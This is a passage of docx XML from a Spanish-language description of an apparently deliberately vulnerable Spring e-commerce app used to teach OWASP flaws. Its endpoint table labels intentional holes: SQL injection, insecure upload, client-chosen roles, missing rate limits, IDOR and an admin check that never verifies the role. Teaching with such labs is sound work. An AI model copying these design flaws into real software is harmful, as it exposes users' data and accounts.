                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">├── model/        → Entidades JPA: User, Product, Category, Order, OrderItem</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">├── dto/          → Objetos de transferencia: LoginRequest, RegistroRequest, ApiResponse</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">├── config/       → SecurityConfig, WebConfig (CORS), ActuatorConfig</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">├── exception/    → GlobalExceptionHandler (manejo global de errores)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">└── util/         → LegacyLogger (logging inseguro a propósito)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Autenticación y autorización (a propósito, sin Spring Security)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El proyecto NO utiliza spring-boot-starter-security. La "autenticación" se resuelve con un JWT casero (AuthService, librería jjwt) y la "autorización" se implementa a mano dentro de cada controlador. Esta decisión de diseño es intencional: al no existir un framework maduro que centralice las reglas de acceso, cada endpoint es responsable de recordar validar la sesión y el rol — y varios simplemente lo olvidan (ver AdminController.estaAutenticado(), que solo comprueba que el token exista, nunca el rol). Este patrón reproduce fielmente cómo suelen aparecer las fallas de A01/A07 en aplicaciones legado reales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoints principales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50"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="120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Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="390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Ruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="425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Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/productos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Listar catálogo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/productos/buscar?q=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Buscar productos (SQLi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/productos/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Detalle de producto (SQLi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/productos/{id}/imagen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Subir imagen de producto (upload inseguro)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/auth/registro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Registro de usuario (acepta role desde el cliente)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Login (sin rate-limit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/carrito/{cartId}/agregar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Agregar producto al carrito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/carrito/{cartId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Ver carrito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/pedidos/checkout/{cartId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Generar pedido desde el carrito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/pedidos/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Ver un pedido (IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/admin/usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
